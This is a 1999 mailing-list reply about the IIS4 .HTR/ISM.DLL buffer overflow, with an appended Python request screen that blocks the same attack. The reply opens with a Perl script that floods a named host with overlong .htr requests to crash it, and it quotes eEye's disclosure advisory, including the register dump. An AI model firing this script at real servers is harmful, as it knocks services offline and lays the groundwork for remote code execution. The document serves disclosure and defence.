Re: Retina vs. IIS4, Round 2, KO

From: Ryan R Permeh (rrpermehat_private)
Date: Tue Jun 15 1999 - 15:01:23 PDT


    tested, this works for me...  scripting was turned on...  perl exploit
    code follows:
    
    #!/usr/bin/perl
    #props to the absu crew
    use strict;
    use warnings;
    use Net::Telnet;

    # For each length from 2500 to 3499, open a fresh connection to the host
    # named on the command line and send "GET /AAA...A.htr HTTP/1.0" with
    # that many 'A's in the path, echoing each request line to stdout.
    for (my $i = 2500; $i < 3500; $i++) {
        my $obj = Net::Telnet->new(Host => $ARGV[0], Port => 80);
        my $cmd = "GET /" . 'A' x $i . ".htr HTTP/1.0\n";
        print "$cmd\n";
        $obj->print($cmd);
        $obj->close;
    }
    
    
    / eEye - Digital Security Team <eeyeat_private> wrote:
    | Retina vs. IIS4, Round 2
    |
    | Systems Affected:
    |
    | Internet Information Server 4.0 (IIS4)
    | Microsoft Windows NT 4.0 SP3 Option Pack 4
    | Microsoft Windows NT 4.0 SP4 Option Pack 4
    | Microsoft Windows NT 4.0 SP5 Option Pack 4
    |
    | Release Date:
    |
    | June 8, 1999
    |
    | Advisory Code:
    |
    | AD06081999
    |
    | Description:
    |
    | We have been debating how to start out this advisory. How do you explain
    | that 90% or so of the Windows NT web servers on the Internet are open to a
    | hole that lets an attacker execute arbitrary code on the remote web server?
    | So the story starts...
    |
    | The Goal:
    |
    | Find a buffer overflow that will affect 90% of the Windows NT web servers on
    | the Internet. Exploit this buffer overflow.
    |
    | The Theory:
    |
    | There will be overflows in at least one of the default IIS filtered
    | extensions (i.e. .ASP, .IDC, .HTR).  The way we think the exploit will take
    | place is that IIS will pass the full URL to the DLL that handles the
    | extension. Therefore if the ISAPI DLL does not do proper bounds checking it
    | will overflow a buffer taking IIS (inetinfo.exe) with it and allow us to
    | execute arbitrary code on the remote server.
    |
    | Entrance Retina:
    |
    | At the same time of working on this advisory we have been working on the AI
    | mining logic for Retina's HTTP module. What better test scenario than this?
    | We gave Retina a list of 10 or so extensions common to IIS and instructed it
    | to find any possible holes relating to these extensions.
    |
    | The Grind:
    |
    | After about an hour Retina found what appeared to be a hole. It displayed
    | that after sending "GET /[overflow].htr HTTP/1.0" it had crashed the server.
    | We all crossed our fingers, started up the good ol' debugger and had Retina
    | hit the server again.
    |
    | Note: [overflow] is 3k or so characters... but we will not get into the
    | string lengths and such here. View the debug info and have a look for
    | yourself.
    |
    | The Registers:
    |
    |  EAX = 00F7FCC8 EBX = 00F41130
    |  ECX = 41414141 EDX = 77F9485A
    |  ESI = 00F7FCC0 EDI = 00F7FCC0
    |  EIP = 41414141 ESP = 00F4106C
    |  EBP = 00F4108C EFL = 00000246
    |
    | Note: Retina was using "A" (0x41 in hex) for the character to overflow with.
    | If you're not familiar with buffer overflows a quick note would be that
    | getting our bytes into any of the registers is a good sign, and directly
    | into EIP makes it even easier :)
    |
    | Explain This:
    |
    | The overflow is in relation to the .HTR extensions. IIS includes the
    | capability to allow Windows NT users to change their password via the web
    | directory /iisadmpwd/. This feature is implemented as a set of .HTR files
    | and the ISAPI extension file ISM.DLL. So somewhere along the line when the
    | URL is passed through to ISM.DLL, proper bounds checking is not done and our
    | overflow takes place. The .HTR/ISM.DLL ISAPI filter is installed by default
    | on IIS4 servers. Looks like we got our 90% of the Windows NT web servers
    | part down. However, can we exploit this?
    |
    | The Exploit:
    |
    | Yes. We can definitely exploit this and we have. We will not go into much
    | detail here about how the buffer is exploited and such. Read the comments in
    | the asm file for more information. However, one nice thing to note is that
    | the exploit has been crafted in such a way to work on SP4 and SP5 machines,
    | therefore there is no guessing of offsets and possible accidental crashing
    | of the remote server. We have not tested the exploit on SP3 and would love
    | to know if it works or not. eMail alertat_private if you've successfully
    | exploited this hole on SP3.
    |
    | For more details about the exploit visit the eEye web site at www.eEye.com
    |
    | The Fallout:
    |
    | Almost 90% of the Windows NT web servers on the Internet are affected by
    | this hole. Everyone from NASDAQ to the U.S. Army to Microsoft themselves.
    | No, we did not try it on the above mentioned. But it is easy to verify if a
    | web server is exploitable without using the exploit. Even a server that's
    | locked in a guarded room behind a Cisco Pix can be broken into with this
    | hole. This is a reminder to all software vendors that testing for common
    | security holes in your software is a must. Demand more from your software
    | vendors.
    |
    | The Request. (Well one anyway.)
    |
    | Dear Microsoft,
    |
    | One of the things that we found out is that IIS did not log any trace of our
    | attempted hack. We recommend that you pass all server requests to the
    | logging service before passing them to any ISAPI filters etc. The logging
    | service should be, as named, an actual service running in a separate memory
    | space so that when inetinfo goes down intrusion signatures are still logged.
    |
    | Retina vs. IIS4, Round 2. KO.
    |
    | Fixes:
    |
    | 1. Remove the extension .HTR from the ISAPI DLL list. Microsoft has just
    | updated their checklist to include this interim fix.
    |    http://microsoft.com/security/products/iis/CheckList.asp
    | 2. Apply the patch supplied by Microsoft when available.
    |    http://microsoft.com/security
    |
    | Vendor Status:
    |
    | We contacted Microsoft on June 8th 1999; eEye Digital Security Team provided
    | all information needed to reproduce the exploit and how to fix it.
    | Microsoft's security team did confirm the exploit and is releasing a patch
    | for IIS.
    |
    | Related Links
    |
    | Advisory - On our web site
    | http://www.eEye.com/database/advisories/ad06081999/ad06081999.html
    |
    | Advisory - Retina Brain File used to uncover the hole
    | http://www.eEye.com/database/advisories/ad06081999/ad06081999-brain.html
    |
    | Retina - The Network Security Scanner
    | http://www.eEye.com/retina/
    |
    |
    | Greetings go out to:
    |
    | The former Secure Networks Inc., L0pht, Phrack, ADM, Rhino9, Attrition, HNN
    | and any other security company or organization that believes in full
    | disclosure.
    |
    | Copyright (c) 1999 eEye Digital Security Team
    |
    | Permission is hereby granted for the redistribution of this alert
    | electronically. It is not to be edited in any way without express consent of
    | eEye. If you wish to reprint the whole or any part of this alert in any
    | other medium excluding electronic medium, please e-mail alertat_private for
    | permission.
    |
    | Disclaimer:
    |
    | The information within this paper may change without notice. Use of this
    | information constitutes acceptance for use in an AS IS condition. There are
    | NO warranties with regard to this information. In no event shall the author
    | be liable for any damages whatsoever arising out of or in connection with
    | the use or spread of this information. Any use of this information is at the
    | user's own risk.
    |
    | Please send suggestions, updates, and comments to:
    |
    | eEye Digital Security Team
    |
    | infoat_private
    | www.eEye.com
    |
    |
    
    --
    ----------------------------------------------------------------
    Ryan R Permeh      E-MAIL: rrpermehat_private     
    IS Engineer        WEB   : http://www.rconnect.com
    Rural Connections  HELP  : helpat_private
    		   FAQ   : http://www.rconnect.com/help   
    		   SALES : salesat_private
    ----------------------------------------------------------------
    120 First Street NE   PHONE : (507) 281-5005          
    Rochester, MN 55906   FAX   : (507) 281-9272      
    -----BEGIN PGP PUBLIC KEY BLOCK-----
    Version: PGP for Personal Privacy 5.5.2
    
    mQGiBDcgdWARBADnxcSfGnU0uzDZM95Rw9bXhcCeGut0mhB45TOPvi+dxqC1D4Fi
    a8WusSx+wMg6YvsNoYfUAZH7EGLFFUwmEQRiU1gLZsUZztKGIQZXnTxfkD3sZmDa
    QMZ+Li8vLrcnSA0wMVjeoHmmlGDh6P10AdqgeXrkvjpVLe9XNUE+qF1eNwCg/1Od
    OXKodgatoLW8Su4gNhR86qMD/1LVlPfESc9Ojgi+kQb2KK1q+49Yk4nRa/0JxT8/
    HkT0r9a9Yn21B1rMmvXruQHbqWmMQFhWNbsA3cHB9ggBfk5MntnQthJHQn0BRDRp
    TaQl77b8uftW9h6d1Z4mwbSMkb+ZjaOPGwrrTt9NnSbspdjyluw84rvOKtB8E8uS
    TajABACL6aH5J9rurP/tmLsVXvk4Fpvb9nAENyu+1AJwm05+mpxf+mejkvYAQNRV
    PsOjIdXVgGEZoJxdYNGtJSF4ukHo2kfwJwLR4+UgbO49d+Fuu0mylmiOlrjpFljF
    d947Zuggv5mCPQPeJ9QlmmLGo1HUwEAn7sOEedXDLZ4e17wo97QjUnlhbiBQZXJt
    ZWggPHJycGVybWVoQHJjb25uZWN0LmNvbT6JAEsEEBECAAsFAjcgdWAECwMCAQAK
    CRDZLKC1ZGph5sYIAKDYq6eFSE4oFTIAyuOtcc2PxmdrbQCg3Hjv2cydFHwR+I5S
    5g+VCQjo8vq5Ag0ENyB1YBAIAPZCV7cIfwgXcqK61qlC8wXo+VMROU+28W65Szgg
    2gGnVqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyDvWXpF9Sh01D49Vlf3HZSTz09jdvO
    meFXklnN/biudE/F/Ha8g8VHMGHOfMlm/xX5u/2RXscBqtNbno2gpXI61Brwv0YA
    WCvl9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98iLMcfFstjvbzySPAQ/ClWxiNjrtV
    jLhdONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlAGBGNfISnCnLWhsQDGcgHKXrKlQzZ
    lp+r0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqrol7DVekyCzsAAgIIALjRqRKSXFjt
    MgpciCFucMc+PLZG9nkfHJHWawm/ZJLW99qmBjRF67SDLN9p2b8ZPgVKVtS6udwP
    j5E25JQIgS137FZ8hpyEorXyYXHbnN3Wt7Wg6auJY4NOJVKePx2TWjCMgpgXCuf0
    Z0+aYXYB/KG52sj0P0l/m5QjE35ftPJHnALoHjYwRcdPty3FTG3XT9+ctsl0PKSP
    983KxkyFNuNFhZBUyxATUhAbosHDBOew2eoBf6xXMAs4b27ljGrisIttX5h5N3PO
    PqBOwPuL24DqY56borp+jx3+1Ux1FL9sNqxH+AD4aRBYrllyLy5wZS37YgP671Hh
    vA6NTSWnW0iJAEYEGBECAAYFAjcgdWAACgkQ2SygtWRqYeY0BQCcCh+xJQbiUHsB
    JHM9Gml2lBmLMB4AmwT11BegWTahprjZFp1wAD4+6uKo
    =pGLY
    -----END PGP PUBLIC KEY BLOCK-----
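The advisory above makes two defensive points: the .HTR mapping to ISM.DLL should be removed until a patch ships, and requests should be logged before they reach any ISAPI extension so that an attempt is recorded even when inetinfo.exe dies. The following is an added example, written for this page and not taken from the post or from eEye, of a small front-end request screen that applies both ideas. It parses the HTTP request line, writes a bounded log record before any dispatch decision, refuses requests for a disabled extension, and caps the path length handed to any handler. All names (screen_request, Verdict, MAX_PATH_LEN, DISABLED_EXTENSIONS) and the sample request lines are this example's own; the 1024-byte limit and the /iisadmpwd/change.htr path are assumed values, not figures from the advisory.

```python
"""Front-end request screen for the .HTR/ISM.DLL overflow class.

Added example, not part of the original post or the eEye advisory.
It models the advisory's recommendations from the defender's side:
a request is logged *before* any dispatch decision, requests for an
unmapped extension never reach a handler, and over-long paths are
rejected before an ISAPI DLL could copy them into a fixed buffer.
"""
import re
from dataclasses import dataclass
from typing import List

# Longest request path we hand to any extension handler. The advisory's
# crash request used a path of roughly 3k characters; 1024 is an assumed
# policy value for this example, not a figure from the advisory.
MAX_PATH_LEN = 1024

# Extensions whose handler we refuse to dispatch to at all (the interim
# fix in the advisory is to unmap .HTR from the ISAPI DLL list).
DISABLED_EXTENSIONS = {b"htr"}

# Request line: METHOD SP request-target SP HTTP/x.y CRLF (LF tolerated)
REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/(\d\.\d)\r?\n")


@dataclass
class Verdict:
    allowed: bool
    reason: str
    log_line: str


def extension_of(path: bytes) -> bytes:
    """Lower-cased extension of the last path segment, or b'' if none."""
    last = path.rsplit(b"/", 1)[-1]
    if b"." not in last:
        return b""
    return last.rsplit(b".", 1)[-1].lower()


def summarize(path: bytes, keep: int = 48) -> str:
    """Bounded, printable form of an attacker-controlled path for the log,
    so the log record cannot grow with the size of the request."""
    shown = path[:keep].decode("ascii", "replace")
    return shown + ("..." if len(path) > keep else "")


def screen_request(raw: bytes) -> Verdict:
    """Build the log record first, then decide whether the request may
    reach an extension handler."""
    m = REQUEST_LINE.match(raw)
    if not m:
        # Only the byte count is logged: never echo unparsed input.
        return Verdict(False, "malformed request line",
                       "REJECT malformed bytes=%d" % len(raw))
    method = m.group(1).decode("ascii")
    path = m.group(2).split(b"?", 1)[0]          # drop any query string
    # The record exists before any dispatch decision, so a request that
    # would crash the handler is still accounted for.
    record = "%s %s len=%d" % (method, summarize(path), len(path))
    ext = extension_of(path)
    if ext in DISABLED_EXTENSIONS:
        return Verdict(False, "handler disabled for ." + ext.decode("ascii"),
                       "REJECT unmapped " + record)
    if len(path) > MAX_PATH_LEN:
        return Verdict(False, "path too long", "REJECT oversize " + record)
    return Verdict(True, "ok", "ALLOW " + record)


def screen_all(requests: List[bytes]) -> List[Verdict]:
    return [screen_request(r) for r in requests]


# Constructed sample traffic (not captured data). The third entry has the
# shape of the request the post's loop sends; the other paths are invented.
SAMPLE_REQUESTS = [
    b"GET /default.asp HTTP/1.0\r\n\r\n",
    b"GET /iisadmpwd/change.htr HTTP/1.0\r\n\r\n",
    b"GET /" + b"A" * 3000 + b".htr HTTP/1.0\n",
    b"GET /" + b"B" * 2000 + b".asp?x=1 HTTP/1.0\r\n\r\n",
    b"not an http request\r\n",
]

if __name__ == "__main__":
    for v in screen_all(SAMPLE_REQUESTS):
        print(v.log_line)
```

In a deployment the log record would be handed to a separate process before the request is dispatched, which is exactly the separation the advisory asks Microsoft for; here it is returned alongside the verdict so the ordering is visible. The length cap is a second, independent control: it catches the same overflow shape against any other extension handler, not only .HTR.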
    


